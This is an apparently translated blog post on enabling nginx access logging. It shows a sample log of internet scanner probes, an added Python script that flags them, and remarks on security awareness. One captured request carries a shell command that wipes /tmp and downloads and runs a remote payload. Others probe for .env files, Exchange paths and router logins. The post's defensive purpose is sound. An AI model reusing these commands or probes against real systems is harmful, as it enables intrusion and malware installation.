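When you use nginx as a proxy server, be sure to enable access logging and monitor the log for large numbers of illegitimate requests.
If you find anything abnormal, deal with it promptly to avoid losses.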
/usr/local/nginx/conf/nginx.conf
Enable logging
log_format hzsrlog '===>>>$remote_addr - $remote_user [$time_local] "$http_referer" "$request" "$http_user_agent" status=$status sentsize=$body_bytes_sent time=$request_time';
access_log logs/access.log hzsrlog;
===>>>83.97.20.34 罗马尼亚布加勒斯特- - [02/Apr/2022:13:44:55 +0800] "-" "GET / HTTP/1.1" "-" status=502 sentsize=537 time=0.003
===>>>172.93.110.253美国佛罗里达迈阿密 - - [02/Apr/2022:13:47:27 +0800] "-" "GET /users/sign_in HTTP/1.1" "python-requests/2.22.0" status=404 sentsize=153 time=0.000
===>>>128.1.248.42美国加利福尼亚洛杉矶 - - [02/Apr/2022:14:02:32 +0800] "-" "GET / HTTP/1.1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" status=502 sentsize=537 time=0.003
===>>>178.73.215.171瑞典斯德哥尔摩 - - [02/Apr/2022:14:15:43 +0800] "-" "GET / HTTP/1.0" "-" status=502 sentsize=537 time=0.002
===>>>216.244.66.240 美国华盛顿西雅图- - [02/Apr/2022:14:24:57 +0800] "-" "GET /login HTTP/1.1" "Mozilla/5.0 (compatible; DotBot/1.2; +; [email protected])" status=404 sentsize=153 time=0.000
===>>>192.241.225.73美国加利福尼亚旧金山 - - [02/Apr/2022:14:27:26 +0800] "-" "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" "Mozilla/5.0 zgrab/0.x" status=502 sentsize=537 time=0.003
===>>>37.252.88.3亚美尼亚 - - [02/Apr/2022:14:30:25 +0800] "-" "GET / HTTP/1.1" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" status=403 sentsize=555 time=0.000
===>>>187.102.96.30巴西 - - [02/Apr/2022:15:04:00 +0800] "-" "GET /shell?cd+/tmp;rm+-rf+*;wget+110.45.146.209/jaws;sh+/tmp/jaws HTTP/1.1" "Hello, world" status=404 sentsize=153 time=0.000
===>>>31.7.65.77伊朗 - - [02/Apr/2022:15:22:16 +0800] "-" "GET /owa/auth/x.js HTTP/1.1" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36" status=502 sentsize=537 time=0.003
===>>>139.59.149.255德国法兰克福 - - [02/Apr/2022:15:31:59 +0800] "-" "\x05\xF1\x8D\xDBK\xB4Y\x9E\x0F3\xF7\x15z\xCE" "-" status=400 sentsize=157 time=0.010
===>>>92.53.64.29俄罗斯 - - [02/Apr/2022:15:35:57 +0800] ":80/admin/login.asp" "POST /boaform/admin/formLogin HTTP/1.1" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/ Firefox/71.0" status=404 sentsize=153 time=0.000
===>>>109.237.103.9俄罗斯伊尔库茨克 - - [02/Apr/2022:15:56:46 +0800] "-" "GET /.env HTTP/1.1" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" status=404 sentsize=555 time=0.000
===>>>194.242.56.116西班牙 - - [02/Apr/2022:16:01:50 +0800] "-" "GET / HTTP/1.1" "-" status=403 sentsize=153 time=0.000
===>>>167.94.146.60美国亚利桑那凤凰城 - - [02/Apr/2022:16:15:36 +0800] "-" "GET / HTTP/1.1" "Mozilla/5.0 (compatible; CensysInspect/1.1; +" status=502 sentsize=537 time=0.755
===>>>157.55.39.79美国华盛顿昆西 微软云 - - [02/Apr/2022:16:28:29 +0800] "-" "GET / HTTP/1.1" "Mozilla/5.0 (compatible; bingbot/2.0; +" status=502 sentsize=537 time=0.858
===>>>45.155.205.127荷兰德伦特 - - [02/Apr/2022:17:36:51 +0800] "-" "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" "-" status=400 sentsize=157 time=0.250
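One way to scan a log in the hzsrlog format for the kinds of probes shown above, as an added example that is not part of the original post. The rule lists are illustrative assumptions drawn from the sample entries, the sample lines are constructed, and the parser assumes raw nginx output without the location text that follows the IP in the listing above.

```python
import re
from collections import Counter

# Parser for the hzsrlog format; assumes nothing is appended after the client IP.
LINE_RE = re.compile(
    r'^===>>>(?P<ip>\S+) - \S+ \[[^\]]+\] "(?P<referer>.*?)" "(?P<request>.*?)" '
    r'"(?P<agent>.*?)" status=(?P<status>\d{3}) sentsize=\d+ time=[\d.]+$')
REQUEST_RE = re.compile(r'^[A-Z]+ (?P<uri>\S+) HTTP/\d\.\d$')
# Illustrative rule lists, taken from probes visible in the page's sample log.
PROBE_PATHS = ("/.env", "/owa/", "/ecp/", "/boaform/")
SCANNER_AGENTS = ("zgrab", "python-requests", "censysinspect")

def classify(line):
    """Return the rule tags hit by one log line, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    tags = []
    req = REQUEST_RE.match(m["request"])
    if req is None:
        tags.append("non-http-probe")   # e.g. RDP or TLS bytes sent to the HTTP port
    else:
        uri = req["uri"].lower()
        if any(uri.startswith(p) for p in PROBE_PATHS):
            tags.append("probe-path")
        if ";" in uri:
            tags.append("shell-metachar")
    if any(a in m["agent"].lower() for a in SCANNER_AGENTS):
        tags.append("scanner-agent")
    return tags

def flagged_by_ip(lines):
    """Count, per client IP, the requests that hit at least one rule."""
    hits = Counter()
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m and classify(line):
            hits[m["ip"]] += 1
    return hits

# Constructed sample lines (documentation IP ranges), modelled on the log above.
SAMPLE = [
    r'===>>>203.0.113.10 - - [02/Apr/2022:15:56:46 +0800] "-" "GET /.env HTTP/1.1" "Mozilla/5.0" status=404 sentsize=555 time=0.000',
    r'===>>>203.0.113.10 - - [02/Apr/2022:15:57:02 +0800] "-" "POST /boaform/admin/formLogin HTTP/1.1" "python-requests/2.22.0" status=404 sentsize=153 time=0.000',
    r'===>>>203.0.113.11 - - [02/Apr/2022:17:36:51 +0800] "-" "\x03\x00\x00/*\xE0Cookie: mstshash=Administr" "-" status=400 sentsize=157 time=0.250',
    r'===>>>192.0.2.5 - - [02/Apr/2022:18:00:00 +0800] "-" "GET /index.html HTTP/1.1" "Mozilla/5.0" status=200 sentsize=1024 time=0.001',
]

if __name__ == "__main__":
    print(flagged_by_ip(SAMPLE).most_common())
```
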
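Why does a server get illegitimate access? Even if you have never published the domain name to anyone, as long as your site is reachable by domain name and port 80 or port 443 is open, it can be attacked. These attacks generally work by exploiting vulnerabilities in the web application on your server, and in serious cases the attacker can take control of your machine. The log4j logging security incident a while back is one example.
Illegitimate access is unavoidable. If your site rarely receives any, that only means it is not yet good enough or has not been online for long. Illegitimate access is not frightening; what is frightening is not having enough security awareness.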
!!!